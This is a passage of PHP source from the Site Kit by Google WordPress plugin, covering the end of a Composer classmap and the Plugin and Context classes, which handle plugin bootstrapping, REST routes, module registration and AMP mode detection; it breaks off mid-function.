'/Modules/Analytics_4/Advanced_Tracking/Script_Injector.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Audience_Settings' => $baseDir . '/Modules/Analytics_4/Audience_Settings.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Conversion_Reporting\\Conversion_Reporting_Cron' => $baseDir . '/Modules/Analytics_4/Conversion_Reporting/Conversion_Reporting_Cron.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Conversion_Reporting\\Conversion_Reporting_Events_Sync' => $baseDir . '/Modules/Analytics_4/Conversion_Reporting/Conversion_Reporting_Events_Sync.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Conversion_Reporting\\Conversion_Reporting_New_Badge_Events_Sync' => $baseDir . '/Modules/Analytics_4/Conversion_Reporting/Conversion_Reporting_New_Badge_Events_Sync.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Conversion_Reporting\\Conversion_Reporting_Provider' => $baseDir . '/Modules/Analytics_4/Conversion_Reporting/Conversion_Reporting_Provider.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Custom_Dimensions_Data_Available' => $baseDir . '/Modules/Analytics_4/Custom_Dimensions_Data_Available.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Datapoints\\Create_Account_Ticket' => $baseDir . '/Modules/Analytics_4/Datapoints/Create_Account_Ticket.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Datapoints\\Create_Property' => $baseDir . '/Modules/Analytics_4/Datapoints/Create_Property.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Datapoints\\Create_Webdatastream' => $baseDir . '/Modules/Analytics_4/Datapoints/Create_Webdatastream.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Email_Reporting\\Audience_Config' => $baseDir . '/Modules/Analytics_4/Email_Reporting/Audience_Config.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Email_Reporting\\Report_Data_Builder' => $baseDir . '/Modules/Analytics_4/Email_Reporting/Report_Data_Builder.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Email_Reporting\\Report_Data_Processor' => $baseDir . '/Modules/Analytics_4/Email_Reporting/Report_Data_Processor.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Email_Reporting\\Report_Options' => $baseDir . '/Modules/Analytics_4/Email_Reporting/Report_Options.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Email_Reporting\\Report_Request_Assembler' => $baseDir . '/Modules/Analytics_4/Email_Reporting/Report_Request_Assembler.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\GoogleAnalyticsAdmin\\AccountProvisioningService' => $baseDir . '/Modules/Analytics_4/GoogleAnalyticsAdmin/AccountProvisioningService.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\GoogleAnalyticsAdmin\\AccountsResource' => $baseDir . '/Modules/Analytics_4/GoogleAnalyticsAdmin/AccountsResource.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\GoogleAnalyticsAdmin\\EnhancedMeasurementSettingsModel' => $baseDir . '/Modules/Analytics_4/GoogleAnalyticsAdmin/EnhancedMeasurementSettingsModel.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\GoogleAnalyticsAdmin\\PropertiesAdSenseLinksService' => $baseDir . '/Modules/Analytics_4/GoogleAnalyticsAdmin/PropertiesAdSenseLinksService.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\GoogleAnalyticsAdmin\\PropertiesAudiencesService' => $baseDir . '/Modules/Analytics_4/GoogleAnalyticsAdmin/PropertiesAudiencesService.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\GoogleAnalyticsAdmin\\PropertiesEnhancedMeasurementResource' => $baseDir . '/Modules/Analytics_4/GoogleAnalyticsAdmin/PropertiesEnhancedMeasurementResource.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\GoogleAnalyticsAdmin\\PropertiesEnhancedMeasurementService' => $baseDir . '/Modules/Analytics_4/GoogleAnalyticsAdmin/PropertiesEnhancedMeasurementService.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\GoogleAnalyticsAdmin\\Proxy_GoogleAnalyticsAdminProvisionAccountTicketRequest' => $baseDir . '/Modules/Analytics_4/GoogleAnalyticsAdmin/Proxy_GoogleAnalyticsAdminProvisionAccountTicketRequest.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report' => $baseDir . '/Modules/Analytics_4/Report.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\Filters\\Between_Filter' => $baseDir . '/Modules/Analytics_4/Report/Filters/Between_Filter.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\Filters\\Empty_Filter' => $baseDir . '/Modules/Analytics_4/Report/Filters/Empty_Filter.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\Filters\\Filter' => $baseDir . '/Modules/Analytics_4/Report/Filters/Filter.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\Filters\\In_List_Filter' => $baseDir . '/Modules/Analytics_4/Report/Filters/In_List_Filter.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\Filters\\Numeric_Filter' => $baseDir . '/Modules/Analytics_4/Report/Filters/Numeric_Filter.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\Filters\\String_Filter' => $baseDir . '/Modules/Analytics_4/Report/Filters/String_Filter.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\ReportParsers' => $baseDir . '/Modules/Analytics_4/Report/ReportParsers.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\Request' => $baseDir . '/Modules/Analytics_4/Report/Request.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\RequestHelpers' => $baseDir . '/Modules/Analytics_4/Report/RequestHelpers.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\Response' => $baseDir . '/Modules/Analytics_4/Report/Response.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Report\\Row_Trait' => $baseDir . '/Modules/Analytics_4/Report/Row_Trait.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Reset_Audiences' => $baseDir . '/Modules/Analytics_4/Reset_Audiences.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Resource_Data_Availability_Date' => $baseDir . '/Modules/Analytics_4/Resource_Data_Availability_Date.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Settings' => $baseDir . '/Modules/Analytics_4/Settings.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Synchronize_AdSenseLinked' => $baseDir . '/Modules/Analytics_4/Synchronize_AdSenseLinked.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Synchronize_AdsLinked' => $baseDir . '/Modules/Analytics_4/Synchronize_AdsLinked.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Synchronize_Property' => $baseDir . '/Modules/Analytics_4/Synchronize_Property.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Tag_Guard' => $baseDir . '/Modules/Analytics_4/Tag_Guard.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Tag_Interface' => $baseDir . '/Modules/Analytics_4/Tag_Interface.php', 'Google\\Site_Kit\\Modules\\Analytics_4\\Web_Tag' => $baseDir . '/Modules/Analytics_4/Web_Tag.php', 'Google\\Site_Kit\\Modules\\PageSpeed_Insights' => $baseDir . '/Modules/PageSpeed_Insights.php', 'Google\\Site_Kit\\Modules\\PageSpeed_Insights\\Settings' => $baseDir . '/Modules/PageSpeed_Insights/Settings.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager' => $baseDir . '/Modules/Reader_Revenue_Manager.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager\\Admin_Post_List' => $baseDir . '/Modules/Reader_Revenue_Manager/Admin_Post_List.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager\\Contribute_With_Google_Block' => $baseDir . '/Modules/Reader_Revenue_Manager/Contribute_With_Google_Block.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager\\Post_Product_ID' => $baseDir . '/Modules/Reader_Revenue_Manager/Post_Product_ID.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager\\Settings' => $baseDir . '/Modules/Reader_Revenue_Manager/Settings.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager\\Subscribe_With_Google_Block' => $baseDir . '/Modules/Reader_Revenue_Manager/Subscribe_With_Google_Block.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager\\Synchronize_Publication' => $baseDir . '/Modules/Reader_Revenue_Manager/Synchronize_Publication.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager\\Tag_Guard' => $baseDir . '/Modules/Reader_Revenue_Manager/Tag_Guard.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager\\Tag_Matchers' => $baseDir . '/Modules/Reader_Revenue_Manager/Tag_Matchers.php', 'Google\\Site_Kit\\Modules\\Reader_Revenue_Manager\\Web_Tag' => $baseDir . '/Modules/Reader_Revenue_Manager/Web_Tag.php', 'Google\\Site_Kit\\Modules\\Search_Console' => $baseDir . '/Modules/Search_Console.php', 'Google\\Site_Kit\\Modules\\Search_Console\\Datapoints\\SearchAnalytics' => $baseDir . '/Modules/Search_Console/Datapoints/SearchAnalytics.php', 'Google\\Site_Kit\\Modules\\Search_Console\\Datapoints\\SearchAnalyticsBatch' => $baseDir . '/Modules/Search_Console/Datapoints/SearchAnalyticsBatch.php', 'Google\\Site_Kit\\Modules\\Search_Console\\Email_Reporting\\Report_Data_Builder' => $baseDir . '/Modules/Search_Console/Email_Reporting/Report_Data_Builder.php', 'Google\\Site_Kit\\Modules\\Search_Console\\Email_Reporting\\Report_Data_Processor' => $baseDir . '/Modules/Search_Console/Email_Reporting/Report_Data_Processor.php', 'Google\\Site_Kit\\Modules\\Search_Console\\Email_Reporting\\Report_Options' => $baseDir . '/Modules/Search_Console/Email_Reporting/Report_Options.php', 'Google\\Site_Kit\\Modules\\Search_Console\\Email_Reporting\\Report_Request_Assembler' => $baseDir . '/Modules/Search_Console/Email_Reporting/Report_Request_Assembler.php', 'Google\\Site_Kit\\Modules\\Search_Console\\Settings' => $baseDir . '/Modules/Search_Console/Settings.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google' => $baseDir . '/Modules/Sign_In_With_Google.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Authenticator' => $baseDir . '/Modules/Sign_In_With_Google/Authenticator.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Authenticator_Interface' => $baseDir . '/Modules/Sign_In_With_Google/Authenticator_Interface.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Compatibility_Checks\\Compatibility_Check' => $baseDir . '/Modules/Sign_In_With_Google/Compatibility_Checks/Compatibility_Check.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Compatibility_Checks\\Compatibility_Checks' => $baseDir . '/Modules/Sign_In_With_Google/Compatibility_Checks/Compatibility_Checks.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Compatibility_Checks\\Conflicting_Plugins_Check' => $baseDir . '/Modules/Sign_In_With_Google/Compatibility_Checks/Conflicting_Plugins_Check.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Compatibility_Checks\\WP_COM_Check' => $baseDir . '/Modules/Sign_In_With_Google/Compatibility_Checks/WP_COM_Check.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Compatibility_Checks\\WP_Login_Accessible_Check' => $baseDir . '/Modules/Sign_In_With_Google/Compatibility_Checks/WP_Login_Accessible_Check.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Datapoint\\Compatibility_Checks' => $baseDir . '/Modules/Sign_In_With_Google/Datapoint/Compatibility_Checks.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Existing_Client_ID' => $baseDir . '/Modules/Sign_In_With_Google/Existing_Client_ID.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Hashed_User_ID' => $baseDir . '/Modules/Sign_In_With_Google/Hashed_User_ID.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Profile_Reader' => $baseDir . '/Modules/Sign_In_With_Google/Profile_Reader.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Profile_Reader_Interface' => $baseDir . '/Modules/Sign_In_With_Google/Profile_Reader_Interface.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Settings' => $baseDir . '/Modules/Sign_In_With_Google/Settings.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Sign_In_With_Google_Block' => $baseDir . '/Modules/Sign_In_With_Google/Sign_In_With_Google_Block.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Tag_Guard' => $baseDir . '/Modules/Sign_In_With_Google/Tag_Guard.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Tag_Matchers' => $baseDir . '/Modules/Sign_In_With_Google/Tag_Matchers.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\Web_Tag' => $baseDir . '/Modules/Sign_In_With_Google/Web_Tag.php', 'Google\\Site_Kit\\Modules\\Sign_In_With_Google\\WooCommerce_Authenticator' => $baseDir . '/Modules/Sign_In_With_Google/WooCommerce_Authenticator.php', 'Google\\Site_Kit\\Modules\\Site_Verification' => $baseDir . '/Modules/Site_Verification.php', 'Google\\Site_Kit\\Modules\\Tag_Manager' => $baseDir . '/Modules/Tag_Manager.php', 'Google\\Site_Kit\\Modules\\Tag_Manager\\AMP_Tag' => $baseDir . '/Modules/Tag_Manager/AMP_Tag.php', 'Google\\Site_Kit\\Modules\\Tag_Manager\\Settings' => $baseDir . '/Modules/Tag_Manager/Settings.php', 'Google\\Site_Kit\\Modules\\Tag_Manager\\Tag_Guard' => $baseDir . '/Modules/Tag_Manager/Tag_Guard.php', 'Google\\Site_Kit\\Modules\\Tag_Manager\\Tag_Interface' => $baseDir . '/Modules/Tag_Manager/Tag_Interface.php', 'Google\\Site_Kit\\Modules\\Tag_Manager\\Web_Tag' => $baseDir . '/Modules/Tag_Manager/Web_Tag.php', 'Google\\Site_Kit\\Plugin' => $baseDir . '/Plugin.php', ); <?php /** * Class Google\Site_Kit\Plugin * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit; use Google\Site_Kit\Core\Remote_Features\Remote_Features_Provider; use Google\Site_Kit\Core\Util\Feature_Flags; /** * Main class for the plugin. * * @since 1.0.0 */ final class Plugin { /** * The plugin context object. * * @since 1.0.0 * @var Context */ private $context; /** * Main instance of the plugin. * * @since 1.0.0 * @var Plugin|null */ private static $instance = null; /** * Sets the plugin main file. * * @since 1.0.0 * * @param string $main_file Absolute path to the plugin main file. */ public function __construct( $main_file ) { $this->context = new Context( $main_file ); } /** * Retrieves the plugin context object. * * @since 1.0.0 * * @return Context Plugin context. */ public function context() { return $this->context; } /** * Registers the plugin with WordPress. * * @since 1.0.0 */ public function register() { if ( $this->context->is_network_mode() ) { add_action( 'network_admin_notices', function () { ?> <div class="notice notice-warning"> <p> <?php echo wp_kses( __( 'The Site Kit by Google plugin does <strong>not yet offer</strong> a network mode, but we’re actively working on that.', 'google-site-kit' ), array( 'strong' => array(), ) ); ?> </p> </div> <?php } ); return; } $options = new Core\Storage\Options( $this->context ); // Set up remote features before anything else. ( new Remote_Features_Provider( $this->context, $options ) )->register(); // REST route to set up a temporary tag to verify meta tag output works reliably. add_filter( 'googlesitekit_rest_routes', function ( $routes ) { $can_setup = function () { return current_user_can( Core\Permissions\Permissions::SETUP ); }; $routes[] = new Core\REST_API\REST_Route( 'core/site/data/setup-tag', array( array( 'methods' => \WP_REST_Server::EDITABLE, 'callback' => function () { $token = wp_generate_uuid4(); set_transient( 'googlesitekit_setup_token', $token, 5 * MINUTE_IN_SECONDS ); return new \WP_REST_Response( array( 'token' => $token ) ); }, 'permission_callback' => $can_setup, ), ) ); return $routes; } ); // Output temporary tag if set. add_action( 'wp_head', function () { $token = get_transient( 'googlesitekit_setup_token' ); if ( $token ) { printf( '<meta name="googlesitekit-setup" content="%s" />', esc_attr( $token ) ); } } ); $display_site_kit_meta = function () { echo apply_filters( // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped 'googlesitekit_generator', sprintf( '<meta name="generator" content="Site Kit by Google %s" />', esc_attr( GOOGLESITEKIT_VERSION ) ) ); }; add_action( 'wp_head', $display_site_kit_meta ); add_action( 'login_head', $display_site_kit_meta ); // Register activation flag logic outside of 'init' since it hooks into // plugin activation. $activation_flag = new Core\Util\Activation_Flag( $this->context, $options ); $activation_flag->register(); // Register uninstallation logic outside of 'init' since it hooks into // plugin uninstallation. $uninstallation = new Core\Util\Uninstallation( $this->context, $options ); $uninstallation->register(); // Initiate the plugin on 'init' for relying on current user being set. add_action( 'init', function () use ( $options, $activation_flag ) { $transients = new Core\Storage\Transients( $this->context ); $user_options = new Core\Storage\User_Options( $this->context, get_current_user_id() ); $assets = new Core\Assets\Assets( $this->context ); $survey_queue = new Core\User_Surveys\Survey_Queue( $user_options ); $survey_queue->register(); $user_input = new Core\User_Input\User_Input( $this->context, $options, $user_options, $survey_queue ); $authentication = new Core\Authentication\Authentication( $this->context, $options, $user_options, $transients, $user_input ); $authentication->register(); $user_input->register(); $user = new Core\User\User( $user_options ); $user->register(); $modules = new Core\Modules\Modules( $this->context, $options, $user_options, $authentication, $assets ); $modules->register(); $dismissals = new Core\Dismissals\Dismissals( $this->context, $user_options ); $dismissals->register(); $dismissed_items = $dismissals->get_dismissed_items(); $expirables = new Core\Expirables\Expirables( $this->context, $user_options ); $expirables->register(); $permissions = new Core\Permissions\Permissions( $this->context, $authentication, $modules, $user_options, $dismissed_items ); $permissions->register(); $nonces = new Core\Nonces\Nonces( $this->context ); $nonces->register(); // Assets must be registered after Modules instance is registered. $assets->register(); $screens = new Core\Admin\Screens( $this->context, $assets, $modules, $authentication ); $screens->register(); $user_surveys = new Core\User_Surveys\User_Surveys( $authentication, $user_options, $survey_queue ); $user_surveys->register(); ( new Core\Authentication\Setup( $this->context, $user_options, $authentication ) )->register(); ( new Core\Util\Reset( $this->context ) )->register(); ( new Core\Util\Reset_Persistent( $this->context ) )->register(); ( new Core\Util\Developer_Plugin_Installer( $this->context ) )->register(); ( new Core\Tracking\Tracking( $this->context, $user_options, $screens ) )->register(); ( new Core\REST_API\REST_Routes( $this->context ) )->register(); ( new Core\Util\REST_Entity_Search_Controller( $this->context ) )->register(); ( new Core\Admin_Bar\Admin_Bar( $this->context, $assets, $modules ) )->register(); ( new Core\Admin\Available_Tools() )->register(); ( new Core\Admin\Notices() )->register(); ( new Core\Admin\Pointers() )->register(); ( new Core\Admin\Dashboard( $this->context, $assets, $modules ) )->register(); ( new Core\Admin\Authorize_Application( $this->context, $assets ) )->register(); ( new Core\Notifications\Notifications( $this->context, $options, $authentication ) )->register(); ( new Core\Site_Health\Site_Health( $this->context, $options, $user_options, $authentication, $modules, $permissions ) )->register(); ( new Core\Util\Health_Checks( $authentication ) )->register(); ( new Core\Admin\Standalone( $this->context ) )->register(); ( new Core\Util\Activation_Notice( $this->context, $activation_flag, $assets ) )->register(); ( new Core\Feature_Tours\Feature_Tours( $this->context, $user_options ) )->register(); ( new Core\Util\Migration_1_3_0( $this->context, $options, $user_options ) )->register(); ( new Core\Util\Migration_1_8_1( $this->context, $options, $user_options, $authentication ) )->register(); ( new Core\Util\Migration_1_123_0( $this->context, $options ) )->register(); ( new Core\Util\Migration_1_129_0( $this->context, $options ) )->register(); ( new Core\Util\Migration_1_150_0( $this->context, $options ) )->register(); ( new Core\Util\Migration_1_163_0( $this->context, $options ) )->register(); ( new Core\Dashboard_Sharing\Dashboard_Sharing( $this->context ) )->register(); ( new Core\Key_Metrics\Key_Metrics( $this->context, $user_options, $options ) )->register(); ( new Core\Prompts\Prompts( $this->context, $user_options ) )->register(); ( new Core\Consent_Mode\Consent_Mode( $this->context, $modules, $options ) )->register(); ( new Core\Tags\GTag( $options ) )->register(); $conversion_tracking = new Core\Conversion_Tracking\Conversion_Tracking( $this->context, $options ); $conversion_tracking->register(); if ( Feature_Flags::enabled( 'proactiveUserEngagement' ) ) { $data_requests = new Core\Email_Reporting\Email_Reporting_Data_Requests( $this->context, $modules, $conversion_tracking, $transients, $user_options, ); ( new Core\Email_Reporting\Email_Reporting( $this->context, $modules, $data_requests, $authentication, $options, $user_options ) )->register(); } if ( Feature_Flags::enabled( 'googleTagGateway' ) ) { ( new Core\Tags\Google_Tag_Gateway\Google_Tag_Gateway( $this->context, $options ) )->register(); } ( new Core\Tracking\Feature_Metrics() )->register(); if ( Feature_Flags::enabled( 'gtagUserData' ) ) { ( new Core\Tags\Enhanced_Conversions\Enhanced_Conversions() )->register(); } // If a login is happening (runs after 'init'), update current user in dependency chain. add_action( 'wp_login', function ( $username, $user ) use ( $user_options ) { $user_options->switch_user( $user->ID ); }, -999, 2 ); /** * Fires when Site Kit has fully initialized. * * @since 1.0.0 */ do_action( 'googlesitekit_init' ); }, -999 ); // Register _gl parameter to be removed from the URL. add_filter( 'removable_query_args', function ( $args ) { $args[] = '_gl'; return $args; } ); // WP CLI Commands. if ( defined( 'WP_CLI' ) && WP_CLI ) { ( new Core\CLI\CLI_Commands( $this->context ) )->register(); } // Add Plugin Row Meta. ( new Core\Admin\Plugin_Row_Meta() )->register(); // Add Plugin Action Links. ( new Core\Admin\Plugin_Action_Links( $this->context ) )->register(); } /** * Retrieves the main instance of the plugin. * * @since 1.0.0 * * @return Plugin Plugin main instance. */ public static function instance() { return self::$instance; } /** * Loads the plugin main instance and initializes it. * * @since 1.0.0 * * @param string $main_file Absolute path to the plugin main file. * @return bool True if the plugin main instance could be loaded, false otherwise. */ public static function load( $main_file ) { if ( null !== self::$instance ) { return false; } if ( file_exists( GOOGLESITEKIT_PLUGIN_DIR_PATH . 'dist/config.php' ) ) { $config = include GOOGLESITEKIT_PLUGIN_DIR_PATH . 'dist/config.php'; Feature_Flags::set_features( (array) $config['features'] ); } self::$instance = new self( $main_file ); self::$instance->register(); return true; } } <?php /** * Class Google\Site_Kit\Context * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit; use AMP_Options_Manager; use AMP_Theme_Support; use Google\Site_Kit\Core\Util\Input; use Google\Site_Kit\Core\Util\Entity; use Google\Site_Kit\Core\Util\Entity_Factory; /** * Class representing the context in which the plugin is running. * * @since 1.0.0 * @access private * @ignore */ class Context { /** * Primary "standard" AMP website mode. * * @since 1.0.0 Originally introduced. * @since 1.36.0 Marked as unused, see description. * @since 1.108.0 Removed the description and reinstated. * @var string */ const AMP_MODE_PRIMARY = 'primary'; /** * Secondary AMP website mode. * * @since 1.0.0 * @var string */ const AMP_MODE_SECONDARY = 'secondary'; /** * Absolute path to the plugin main file. * * @since 1.0.0 * @var string */ private $main_file; /** * Internal storage for whether the plugin is network active or not. * * @since 1.0.0 * @var bool|null */ private $network_active = null; /** * Input access abstraction. * * @since 1.1.2 * @var Input */ private $input; /** * Constructor. * * @since 1.0.0 * @since 1.1.2 Added optional $input instance. * * @param string $main_file Absolute path to the plugin main file. * @param Input $input Input instance. */ public function __construct( $main_file, ?Input $input = null ) { $this->main_file = $main_file; $this->input = $input ?: new Input(); } /** * Gets the absolute path for a path relative to the plugin directory. * * @since 1.0.0 * * @param string $relative_path Optional. Relative path. Default '/'. * @return string Absolute path. */ public function path( $relative_path = '/' ) { return plugin_dir_path( $this->main_file ) . ltrim( $relative_path, '/' ); } /** * Gets the full URL for a path relative to the plugin directory. * * @since 1.0.0 * * @param string $relative_path Optional. Relative path. Default '/'. * @return string Full URL. */ public function url( $relative_path = '/' ) { return plugin_dir_url( $this->main_file ) . ltrim( $relative_path, '/' ); } /** * Gets the Input instance. * * @since 1.1.2 * * @return Input */ public function input() { return $this->input; } /** * Gets the full URL to an admin screen part of the plugin. * * @since 1.0.0 * * @param string $slug Optional. Plugin admin screen slug. Default 'dashboard'. * @param array $query_args Optional. Additional query args. Default empty array. * @return string Full admin screen URL. */ public function admin_url( $slug = 'dashboard', array $query_args = array() ) { unset( $query_args['page'] ); if ( $this->is_network_mode() ) { $base_url = network_admin_url( 'admin.php' ); } else { $base_url = admin_url( 'admin.php' ); } return add_query_arg( array_merge( array( 'page' => Core\Admin\Screens::PREFIX . $slug ), $query_args ), $base_url ); } /** * Determines whether the plugin is running in network mode. * * @since 1.0.0 * * @return bool True if the plugin is in network mode, false otherwise. */ public function is_network_mode() { // Bail if plugin is not network-active. if ( ! $this->is_network_active() ) { return false; } /** * Filters whether network mode is active in Site Kit. * * This is always false by default since Site Kit does not support a network mode yet. * * @since 1.86.0 * * @param bool $active Whether network mode is active. */ return (bool) apply_filters( 'googlesitekit_is_network_mode', false ); } /** * Gets the cannonical "home" URL. * * Returns the value from the `"googlesitekit_canonical_home_url"` filter. * * @since 1.18.0 * * @return string Cannonical home URL. */ public function get_canonical_home_url() { /** * Filters the canonical home URL considered by Site Kit. * * Typically this is okay to be the unmodified `home_url()`, but certain plugins (e.g. multilingual plugins) * that dynamically modify that value based on context can use this filter to ensure that the URL considered * by Site Kit remains stable. * * @since 1.18.0 * * @param string $home_url The value of `home_url()`. */ return apply_filters( 'googlesitekit_canonical_home_url', home_url() ); } /** * Gets the site URL of the reference site to use for stats. * * @since 1.0.0 * * @return string Reference site URL. */ public function get_reference_site_url() { return $this->filter_reference_url(); } /** * Gets the entity for the current request context. * * An entity in Site Kit terminology is based on a canonical URL, i.e. every * canonical URL has an associated entity. * * An entity may also have a type, a title, and an ID. * * @since 1.7.0 * * @return Entity|null The current entity, or null if none could be determined. */ public function get_reference_entity() { // Support specific URL stats being checked in Site Kit dashboard details view. if ( is_admin() && 'googlesitekit-dashboard' === $this->input()->filter( INPUT_GET, 'page' ) ) { $entity_url_query_param = $this->input()->filter( INPUT_GET, 'permaLink' ); if ( ! empty( $entity_url_query_param ) ) { return $this->get_reference_entity_from_url( $entity_url_query_param ); } } $entity = Entity_Factory::from_context(); return $this->filter_entity_reference_url( $entity ); } /** * Gets the entity for the given URL, if available. * * An entity in Site Kit terminology is based on a canonical URL, i.e. every * canonical URL has an associated entity. * * An entity may also have a type, a title, and an ID. * * @since 1.10.0 * * @param string $url URL to determine the entity from. * @return Entity|null The current entity, or null if none could be determined. */ public function get_reference_entity_from_url( $url ) { // Ensure local URL is used for lookup. $url = str_replace( $this->get_reference_site_url(), untrailingslashit( $this->get_canonical_home_url() ), $url ); $entity = Entity_Factory::from_url( $url ); return $this->filter_entity_reference_url( $entity ); } /** * Gets the permalink of the reference site to use for stats. * * @since 1.0.0 * * @param int|WP_Post $post Optional. Post ID or post object. Default is the global `$post`. * * @return string|false The reference permalink URL or false if post does not exist. */ public function get_reference_permalink( $post = 0 ) { // If post is provided, get URL for that. if ( $post ) { $permalink = get_permalink( $post ); if ( false === $permalink ) { return false; } return $this->filter_reference_url( $permalink ); } // Otherwise use entity detection. $entity = $this->get_reference_entity(); if ( ! $entity || 'post' !== $entity->get_type() ) { return false; } return $entity->get_url(); } /** * Gets the canonical url for the current request. * * @since 1.0.0 * * @return string|false The reference canonical URL or false if no URL was identified. */ public function get_reference_canonical() { $entity = $this->get_reference_entity(); if ( ! $entity ) { return false; } return $entity->get_url(); } /** * Checks whether AMP content is being served. * * @since 1.0.0 * * @return bool True if an AMP request, false otherwise. */ public function is_amp() { if ( is_singular( 'web-story' ) ) { return true; } return function_exists( 'is_amp_endpoint' ) && is_amp_endpoint(); } /** * Gets the current AMP mode. * * @since 1.0.0 * @since 1.108.0 Extracted AMP plugin related logic to `get_amp_mode_from_amp_plugin` function. * * @return bool|string 'primary' if in standard mode, * 'secondary' if in transitional or reader modes, or the Web Stories plugin is active * false if AMP not active, or unknown mode */ public function get_amp_mode() { $amp_mode = $this->get_amp_mode_from_amp_plugin(); if ( false === $amp_mode ) { // If the Web Stories plugin is enabled, consider the site to be running // in Secondary AMP mode. if ( defined( 'WEBSTORIES_VERSION' ) ) { return self::AMP_MODE_SECONDARY; } } return $amp_mode; } /** * Gets the current AMP mode from the AMP plugin. * * @since 1.108.0 * * @return bool|string 'primary' if in standard mode, * 'secondary' if in transitional or reader modes * false if AMP not active, or unknown mode */ private function get_amp_mode_from_amp_plugin() { if ( ! class_exists( 'AMP_Theme_Support' ) ) { return false; } $exposes_support_mode = defined( 'AMP_Theme_Support::STANDARD_MODE_SLUG' ) && defined( 'AMP_Theme_Support::TRANSITIONAL_MODE_SLUG' ) && defined( 'AMP_Theme_Support::READER_MODE_SLUG' ); if ( defined( 'AMP__VERSION' ) ) { $amp_plugin_version = AMP__VERSION; if ( strpos( $amp_plugin_version, '-' ) !== false ) { $amp_plugin_version = explode( '-', $amp_plugin_version )[0]; } $amp_plugin_version_2_or_higher = version_compare( $amp_plugin_version, '2.0.0', '>=' ); } else { $amp_plugin_version_2_or_higher = false; } if ( $amp_plugin_version_2_or_higher ) { $exposes_support_mode = class_exists( 'AMP_Options_Manager' ) && method_exists( 'AMP_Options_Manager', 'get_option' ) && $exposes_support_mode; } else { $exposes_support_mode = class_exists( 'AMP_Theme_Support' ) && method_exists( 'AMP_Theme_Support', 'get_support_mode' ) && $exposes_support_mode; } if ( $exposes_support_mode ) { // If recent version, we can properly detect the mode. if ( $amp_plugin_version_2_or_higher ) { $mode = AMP_Options_Manager::get_option( 'theme_support' ); } else { $mode = AMP_Theme_Support::get_support_mode(); } if ( AMP_Theme_Support::STANDARD_MODE_SLUG === $mode ) { return self::AMP_MODE_PRIMARY; } if ( in_array( $mode, array( 